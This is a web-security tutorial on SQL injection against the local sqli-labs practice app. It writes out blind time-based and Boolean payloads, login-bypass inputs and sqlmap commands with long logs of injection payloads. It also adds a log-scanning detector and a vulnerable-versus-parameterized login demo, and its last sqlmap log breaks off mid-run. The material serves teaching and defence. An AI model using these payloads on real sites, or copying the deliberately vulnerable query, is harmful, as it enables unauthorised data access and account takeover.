Python Full Stack (5) Web Security Attack and Defense, Part 6: SQL Injection and Bypass

I. Blind injection via GET requests

1. Introduction to blind injection

What blind injection is

Blind SQL injection is a form of injection attack in which the attacker sends the database questions that can only be answered true or false and infers the answer from how the application responds.
It arises because the application has been configured to show only generic errors, while the SQL injection flaw in the code itself was never fixed.

Types of blind injection

  • Time-based blind injection
  • Boolean-based blind injection

2. GET time-based blind injection

How it works

In MySQL, if(exp1,exp2,exp3) behaves like a ternary operator:
if exp1 is true, exp2 is evaluated; otherwise exp3 is evaluated.
So the statement:

if(ascii(substr(database(),1,1))=115,1,sleep(3))

returns 1 if ascii(substr(database(),1,1))=115 holds, and otherwise executes sleep(3).
Test:

select if(ascii(substr(database(),1,1))=115,1,sleep(3));

Output:

+--------------------------------------------------+
| if(ascii(substr(database(),1,1))=115,1,sleep(3)) |
+--------------------------------------------------+
|                                                1 |
+--------------------------------------------------+
1 row in set (0.01 sec)

The result is 1, which confirms that ascii(substr(database(),1,1))=115 is true.
The expression takes a substring of the current database name (starting at position 1 with length 1, i.e. the first character) and compares its ASCII code with 115. The current database is security, whose first letter is s, and the ASCII code of s is 115, so the comparison is true.

Checking for an injection point

Visit http://127.0.0.1/sqli-labs/Less-5/?id=1' and if(1=0,1,sleep(3)) --+ ; the page shows:
[Image: SQL Injection GET time id=1' and if(1=0,1,sleep(3))]
The request is delayed by 3 seconds, which shows that an injection point exists and we can move on to the next step.

Determining the length of the database name

The database length means the number of characters in the database name.
Visit http://127.0.0.1/sqli-labs/Less-5/?id=1' and if(length(database())=8,sleep(3),1) --+ ; the page shows:
[Image: SQL Injection GET time id=1' and if(length(database())=8,sleep(3),1) --+]
The request is delayed by 3 seconds, so the database name is 8 characters long (8 was arrived at after many attempts: start by guessing a plausible value and, if there is no delay, keep trying).

Determining the database name

Visit http://127.0.0.1/sqli-labs/Less-5/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(3)) --+ ; the page shows:
[Image: SQL Injection GET time id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(3)) --+]
The request is not delayed, so the first letter of the database name is s; testing each following character in the same way recovers the full database name.

Testing with sqlmap

Test the time-based blind injection with sqlmap as follows:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-5/?id=1 --technique T --current-db

Output:
[Image: sqlmap Injection time]
This takes considerably longer, and it identifies the current database as security.
The payload it used is:
[Image: sqlmap Injection time payload]
id=1' AND (SELECT 9017 FROM (SELECT(SLEEP(5)))oDkD)-- myGo. Testing it by hand:
Visit http://127.0.0.1/sqli-labs/Less-5/?id=1' AND (SELECT 9017 FROM (SELECT(SLEEP(5)))oDkD)-- myGo --+ ; the request is delayed by 5 seconds.

3. GET Boolean-based blind injection

How it works

For Boolean-based blind injection, strings are usually guessed by narrowing down the value with comparisons, as in the following sequence:

SQL statement                                      Page display   Result
((select length(database()))>5)                    normal         true
((select length(database()))>10)                   no output      false
((select length(database()))>7)                    normal         true
((select length(database()))>8)                    no output      false

SQL statement                                      Page display   Result
((select ascii(substr(database(),1,1)))>75)        normal         true
((select ascii(substr(database(),1,1)))>100)       normal         true
((select ascii(substr(database(),1,1)))>113)       normal         true
((select ascii(substr(database(),1,1)))>119)       no output      false
((select ascii(substr(database(),1,1)))>116)       no output      false
((select ascii(substr(database(),1,1)))>114)       normal         true
((select ascii(substr(database(),1,1)))>115)       no output      false
select length(database()); 

select substr(database(),1,1); 

select ascii(substr(database(),1,1)); 

select ascii(substr(database(),1,1)) > N; 

select ascii(substr(database(),1,1)) = N; 

select ascii(substr(database(),1,1)) < N;

Determining the length of the database name

Test in the database:

select length(database()) = 8;

Output:

+------------------------+
| length(database()) = 8 |
+------------------------+
|                      1 |
+------------------------+
1 row in set (0.01 sec)   

It returns 1, i.e. true: the current database name is 8 characters long.
Test again:

select * from users where id = 1 and length(database()) = 8;

Output:

+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)      

Visit http://127.0.0.1/sqli-labs/Less-5/?id=1' and length(database())=8 --+ ; the page shows:
[Image: SQL Injection GET boolean id=1' and length(database())=8 --+]
"You are in..." appears, i.e. the page responds normally.
Then visit http://127.0.0.1/sqli-labs/Less-5/?id=1' and length(database())=9 --+ ; the page shows:
[Image: SQL Injection GET boolean id=1' and length(database())=9 --+]

This time "You are in..." does not appear, so the database name length is 8.

Determining the database name

Test in the database:

select * from users where id = 1 and (select ascii(substr(database(),1,1))=115);

Output:

+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)   

Visit http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select ascii(substr(database(),1,1))=115) --+ and http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select ascii(substr(database(),1,1))=116) --+ ; the pages show:
[Image: SQL Injection GET boolean id=1' and (select ascii(substr(database(),1,1))=115 and 116) --+]
Only the first request responds normally, so the first letter is s.

Testing with sqlmap

Test the Boolean-based blind injection with sqlmap as follows:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-5/?id=1 --technique B --current-db

Output:
[Image: sqlmap Injection boolean]
This takes much less time and likewise identifies the current database as security.
In this situation, Boolean-based blind injection is comparatively efficient.
The payload it used is:
[Image: sqlmap Injection boolean payload]
id=1' AND 3835=3835 AND 'YqTv'='YqTv. Testing it by hand:
Visit http://127.0.0.1/sqli-labs/Less-5/?id=1' AND 3835=3835 AND 'YqTv'='YqTv --+ ; this time the page does not respond normally.
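Seen from the defending side, both the time-based probes of section 2 and the Boolean probes of section 3 leave a recognisable trace in the web server's access log: the decoded query string carries sleep()/ascii()/substr()/length() calls, "AND n=n" comparisons and a comment terminator, and the time-based variant also shows up as an abnormally slow response. The following detector is an added example written for this page, not code from the tutorial or from sqli-labs; it assumes an nginx-style combined log with the response time appended as the last field, and the sample log lines are constructed from the payloads shown above.

```python
import re
from urllib.parse import unquote_plus

# Assumed log layout (not from the tutorial): nginx "combined" format with the
# response time in seconds appended as the last field:
#   <ip> - - [<timestamp>] "<method> <path> <proto>" <status> <bytes> <request_time>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt>[\d.]+)\s*$'
)

# Building blocks of the probes shown above: sleep()/benchmark() for the
# time-based variant, ascii/substr/length/database() and "AND n=n" for the
# Boolean variant, and a comment sequence that drops the rest of the query.
TIME_SIGS = re.compile(r'\b(sleep|benchmark)\s*\(', re.I)
BOOL_SIGS = re.compile(
    r'\b(ascii|substr|substring|length|database)\s*\(|\b(and|or)\s+\d+\s*=\s*\d+', re.I)
COMMENT_SIGS = re.compile(r'--\s|#|/\*')

SLOW_SECONDS = 3.0  # the tutorial's payloads sleep for 3 or 5 seconds


def parse_line(line):
    """Split one access-log line into fields; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['rt'] = float(entry['rt'])
    # Decode the query string the way the backend sees it (%27 -> ', + -> space).
    entry['decoded'] = unquote_plus(entry['path'])
    return entry


def classify(entry):
    """Return the list of reasons one request looks like a blind-SQLi probe."""
    q = entry['decoded']
    has_quote = "'" in q or '"' in q
    reasons = []
    if TIME_SIGS.search(q):
        reasons.append('time-based signature')
    if BOOL_SIGS.search(q):
        reasons.append('boolean-based signature')
    if has_quote and COMMENT_SIGS.search(q):
        reasons.append('quote + comment terminator')
    # Latency is the side channel itself: a slow response to a request that
    # carries a quote is worth a look even if the function names were disguised.
    if has_quote and entry['rt'] >= SLOW_SECONDS:
        reasons.append('slow response (%.1fs) with quote' % entry['rt'])
    return reasons


def scan(lines):
    """Return [(ip, decoded_path, reasons)] for every suspicious request."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry['ip'], entry['decoded'], reasons))
    return hits


# Constructed sample log: one benign request and three probes built from the
# payloads used in the GET sections of this tutorial.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Mar/2020:20:11:23 +0800] "GET /sqli-labs/Less-5/?id=1 HTTP/1.1" 200 1234 0.012',
    '10.0.0.7 - - [04/Mar/2020:20:11:30 +0800] "GET /sqli-labs/Less-5/?id=1%27%20and%20if(1=0,1,sleep(3))%20--+ HTTP/1.1" 200 1234 3.014',
    '10.0.0.7 - - [04/Mar/2020:20:11:35 +0800] "GET /sqli-labs/Less-5/?id=1%27%20and%20length(database())=9%20--+ HTTP/1.1" 200 890 0.010',
    '10.0.0.7 - - [04/Mar/2020:20:11:40 +0800] "GET /sqli-labs/Less-5/?id=1%27%20AND%203835=3835%20AND%20%27YqTv%27=%27YqTv HTTP/1.1" 200 1234 0.011',
]

if __name__ == '__main__':
    for ip, path, reasons in scan(SAMPLE_LOG):
        print(ip, path, '->', ', '.join(reasons))
```

The benign request is not flagged; the sleep(3) probe is flagged on three counts (function name, comment terminator and the 3-second response); and the sqlmap-style "AND 3835=3835" payload, which contains no function name at all, is still caught by the tautology pattern. Decoding before matching matters: the signatures are written against the decoded query string, because that is the text the database parser eventually sees.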

II. Injection via POST requests

1. POST error-based injection

Characteristics of POST requests

  • POST requests are not cached
  • POST requests are not kept in the browser history
  • A URL requested via POST cannot be saved as a browser bookmark
  • POST requests have no length limit

POST error-based injection with single quotes

The injection point has moved: it can no longer be viewed and modified directly in the browser address bar, so a suitable browser plugin is used to modify the request.
Submit the form at http://127.0.0.1/sqli-labs/Less-11/ to test:
[Image: SQL Injection POST error single quote 1]
An error appears:

'admin' LIMIT 0,1'

From this we can guess the SQL statement is:

select * from xxx where uname = 'uname' or 1 = 1 -- ' and passwd = 'password';

Test:
Enter admin' or 1 = 1 -- as the username, any value as the password, and submit. The page shows:
[Image: SQL Injection POST error single quote 2]
The login succeeds.

POST error-based injection with double quotes

As with the single-quote case, the request cannot be viewed and modified in the browser, so a suitable plugin is needed.
Submit the form at http://127.0.0.1/sqli-labs/Less-12/ to test:
[Image: SQL Injection POST error double quote 1]
An error appears:

'123") LIMIT 0,1'

From this we can guess the SQL statement is:

select * from xxx where uname = ("uname") or 1 = 1 -- ") and passwd = 'password';

Test:
Enter admin") or 1 = 1 -- as the username, any value as the password, and submit. The page shows:
[Image: SQL Injection POST error double quote 2]
The login succeeds here too.
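The two login bypasses above work for one reason: the form values are concatenated into the SQL text, so a quote in the username ends the string literal and "or 1 = 1 --" rewrites the WHERE clause, while a stray quote produces the parser error the page prints. The example below, added for this page and not the PHP code of sqli-labs, puts the guessed query beside its hardened form. It uses an in-memory SQLite table constructed here instead of the lab's MySQL database (SQLite also treats "--" as a comment, so the same input shows the same effect), and it stores the password in plain text only to mirror the lab's users table.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the lab's users table."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)')
    conn.executemany('INSERT INTO users (username, password) VALUES (?, ?)',
                     [('Dumb', 'Dumb'), ('admin', 'admin')])
    return conn


def login_vulnerable(conn, uname, passwd):
    """String-built query of the shape guessed above: the input becomes SQL text."""
    sql = "SELECT * FROM users WHERE username = '%s' AND password = '%s'" % (uname, passwd)
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # The parser error is handed back verbatim, which is what the lab pages
        # print and what the error-based sections above rely on.
        return ('error', str(exc))
    return ('ok', rows) if rows else ('denied', [])


def login_safe(conn, uname, passwd):
    """Parameterized query: the driver binds the values, so quotes, 'or 1 = 1'
    and comment sequences are compared as data and never parsed as SQL."""
    sql = 'SELECT * FROM users WHERE username = ? AND password = ?'
    try:
        rows = conn.execute(sql, (uname, passwd)).fetchall()
    except sqlite3.Error:
        # Nothing to leak: a generic message for the user; the detail belongs in a log.
        return ('error', 'login failed')
    return ('ok', rows) if rows else ('denied', [])


if __name__ == '__main__':
    db = make_db()
    bypass = "admin' or 1 = 1 -- "
    print('vulnerable, bypass:     ', login_vulnerable(db, bypass, 'anything'))
    print('vulnerable, lone quote: ', login_vulnerable(db, "admin'", 'anything'))
    print('safe, bypass:           ', login_safe(db, bypass, 'anything'))
    print('safe, real credentials: ', login_safe(db, 'admin', 'admin'))
```

Against the string-built query the bypass input returns every row, and a lone quote surfaces a syntax error, exactly the two behaviours the lab pages show. Against the parameterized query the same bypass input is simply a username that does not exist, and only the real credentials log in.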

Testing with sqlmap

(1) Single-quote error-based injection test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-11/ --data="uname=admin&passwd=123" --current-db

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [)]     | .'| . |                                                                                                                                 
|___|_  [.]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program               
                                                                                                                                                          
[*] starting @ 20:11:23 /2020-03-04/                                                                                                                      
                                                                                                                                                          
[20:11:23] [INFO] testing connection to the target URL                                                                                                    
[20:11:23] [INFO] checking if the target is protected by some kind of WAF/IPS                                                                             
[20:11:23] [INFO] testing if the target URL content is stable                                                                                             
[20:11:24] [INFO] target URL content is stable                                                                                                            
[20:11:24] [INFO] testing if POST parameter 'uname' is dynamic                                                                                            
[20:11:24] [WARNING] POST parameter 'uname' does not appear to be dynamic                                                                                 
[20:11:24] [INFO] heuristic (basic) test shows that POST parameter 'uname' might be injectable (possible DBMS: 'MySQL')                                   
[20:11:24] [INFO] heuristic (XSS) test shows that POST parameter 'uname' might be vulnerable to cross-site scripting (XSS) attacks                        
[20:11:24] [INFO] testing for SQL injection on POST parameter 'uname'                                                                                     
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]                                            
                                                                                                                                                          
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]                             
                                                                                                                                                          
[20:11:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                                                              
[20:11:26] [WARNING] reflective value(s) found and filtering out                                                                                          
[20:11:26] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'                                                                      
[20:11:26] [INFO] testing 'Generic inline queries'                                                                                                        
[20:11:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'                                                              
[20:11:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'                                                               
[20:11:28] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'                                                         
[20:11:29] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'                                                  
[20:11:31] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'                                         
[20:11:32] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'                                          
[20:11:34] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'                                              
[20:11:37] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'                                               
[20:11:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'                                         
[20:11:40] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'                                          
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'                                                                      
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'                                                     
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'                                                                           
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'                                                          
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'                                                                      
[20:11:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'                                                     
[20:11:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'                                                                  
[20:11:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'                                                 
[20:11:42] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'                                                                   
[20:11:42] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'                                                  
[20:11:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'                                                                            
[20:11:43] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'                                                                             
[20:11:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                   
[20:11:44] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'                                                        
[20:11:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'                                               
[20:11:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'                                                                    
[20:11:48] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'                                       
[20:11:49] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'                                                            
[20:11:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                             
[20:11:50] [INFO] POST parameter 'uname' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable                
[20:11:50] [INFO] testing 'MySQL inline queries'                                                                                                          
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'                                                                                     
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries'                                                                                               
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'                                                                       
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'                                                                                 
[20:11:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'                                                                        
[20:11:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'                                                                                  
[20:11:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'                                                                            
[20:12:00] [INFO] POST parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable                                    
[20:12:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'                                                                                  
[20:12:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'                                                                                    
[20:12:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found     
[20:12:01] [INFO] target URL appears to be UNION injectable with 2 columns                                                                                
[20:12:01] [INFO] POST parameter 'uname' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable                                                       
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]                                                              
                                                                                                                                                          
sqlmap identified the following injection point(s) with a total of 1074 HTTP(s) requests:                                                                 
---                                                                                                                                                       
Parameter: uname (POST)                                                                                                                                   
    Type: error-based                                                                                                                                     
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)                                                              
    Payload: uname=admin' AND (SELECT 2046 FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(2046=2046,1))),0x7171626271,FLOOR(RAND(0)*2))x FROM INFOR
MATION_SCHEMA.PLUGINS GROUP BY x)a)-- cRtr&passwd=123                                                                                                     
                                                                                                                                                          
    Type: time-based blind                                                                                                                                
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                             
    Payload: uname=admin' AND (SELECT 5495 FROM (SELECT(SLEEP(5)))pVWe)-- Kzkg&passwd=123                                                                 
                                                                                                                                                          
    Type: UNION query                                                                                                                                     
    Title: MySQL UNION query (NULL) - 2 columns                                                                                                           
    Payload: uname=-1041' UNION ALL SELECT CONCAT(0x716a707071,0x56476a6e76776f4a657355716c53774761706f57684856426e666965477954624a78444866597550,0x717162
6271),NULL#&passwd=123                                                                                                                                    
---                                                                                                                                                       
[20:12:02] [INFO] the back-end DBMS is MySQL                                                                                                              
[20:12:02] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'                          
back-end DBMS: MySQL >= 5.0                                                                                                                               
[20:12:02] [INFO] fetching current database                                                                                                               
current database: 'security'                                                                                                                              
[20:12:02] [INFO] fetched data logged to text files under 'xxxx\output\127.0.0.1'                                         
                                                                                                                                                          
[*] ending @ 20:12:02 /2020-03-04/                                                                                                                        
                                                                                                                                                          
                                                                                                                                                          

(2) Double-quote error-based injection test:
First create a file target.txt, then capture the request parameters into it as shown below:
[Image: sqlmap error double quote]
Then test:

python sqlmap.py -r "xxxx\target.txt" -p passwd --technique E

Output:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:22:24 /2020-03-04/

[20:22:24] [CRITICAL] specified HTTP request file 'xxxx\target.txt' does not exist

[*] ending @ 20:22:24 /2020-03-04/


E:\SQLMAP\sqlmapproject-sqlmap-0605f14
λ python sqlmap.py -r C:\Users\Lenovo\Desktop\target.txt -p passwd --technique E
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:23:02 /2020-03-04/

[20:23:02] [INFO] parsing HTTP request from 'xxxx\target.txt'
[20:23:02] [WARNING] provided value for parameter 'passwd' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[20:23:02] [INFO] resuming back-end DBMS 'mysql'
[20:23:02] [INFO] testing connection to the target URL
[20:23:03] [INFO] heuristic (basic) test shows that POST parameter 'passwd' might be injectable (possible DBMS: 'MySQL')
[20:23:03] [INFO] testing for SQL injection on POST parameter 'passwd'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:23:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:23:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:23:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:23:08] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:23:09] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:23:10] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:23:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:23:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:23:13] [INFO] POST parameter 'passwd' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
POST parameter 'passwd' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 381 HTTP(s) requests:
---
Parameter: passwd (POST)
    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uname=&passwd=") OR (SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(5753=5753,1))),0x716b717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("wTnR"="wTnR&submit=Submit
---
[20:23:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[20:23:15] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 20:23:15 /2020-03-04/

                                                                                                                                              

Using Burp Suite

See https://blog.csdn.net/ft4729710/article/details/58164973

2. POST time-based blind injection

Append the following to the POST parameter at the injection point:

and (select (if(length(database())>5,sleep(5),null))) -- 

If the page takes more than 5 seconds to respond, an injection point definitely exists and the injected SQL was executed.
Test first, as follows:
[Image: SQL Injection POST time 1]
Although there is no explicit error message, normal and erroneous requests can still be told apart.
Enter admin' and (select (if(length(database())>5,sleep(5),null))) -- as the username, any value as the password, and submit:
[Image: SQL Injection POST time 2]
The request is delayed by 5 seconds, which shows that an injection point exists.

Testing with sqlmap:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-15/ --data="uname=admin&passwd=123" --current-db --technique T

Output:

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:46:34 /2020-03-04/

[20:46:34] [INFO] testing connection to the target URL
[20:46:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:46:34] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[20:46:34] [INFO] testing for SQL injection on POST parameter 'uname'
[20:46:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:46:34] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[20:46:45] [INFO] POST parameter 'uname' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[20:46:55] [INFO] checking if the injection point on POST parameter 'uname' is a false positive
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 8829 FROM (SELECT(SLEEP(5)))PxOu) AND 'Bvhj'='Bvhj&passwd=123
---
[20:47:15] [INFO] the back-end DBMS is MySQL
[20:47:15] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12
[20:47:15] [INFO] fetching current database
[20:47:15] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]

[20:47:31] [INFO] adjusting time delay to 1 second due to good response times
security
current database: 'security'
[20:47:52] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 20:47:52 /2020-03-04/

                                                                                                                                     

The current database is identified.

3. POST Boolean-based blind injection

Append a conditional test to the POST parameter at the injection point, for example a comparison of the form:

select ascii(substr(database(),1,1)) < N;

Enter admin' and (length(database())>10) -- as the username, any value as the password, and submit:
[Image: SQL Injection POST boolean]
An injection point exists.

Testing with sqlmap:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-15/ --data="uname=admin&passwd=123" --current-db --technique B

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[(]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [)]     | .'| . |                                                                                                                                 
|___|_  [)]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program               
                                                                                                                                                          
[*] starting @ 20:49:40 /2020-03-04/                                                                                                                      
                                                                                                                                                          
[20:49:40] [INFO] testing connection to the target URL                                                                                                    
[20:49:40] [INFO] checking if the target is protected by some kind of WAF/IPS                                                                             
[20:49:40] [INFO] testing if the target URL content is stable                                                                                             
[20:49:41] [INFO] target URL content is stable                                                                                                            
[20:49:41] [INFO] testing if POST parameter 'uname' is dynamic                                                                                            
[20:49:41] [WARNING] POST parameter 'uname' does not appear to be dynamic                                                                                 
[20:49:41] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable                                                     
[20:49:41] [INFO] testing for SQL injection on POST parameter 'uname'                                                                                     
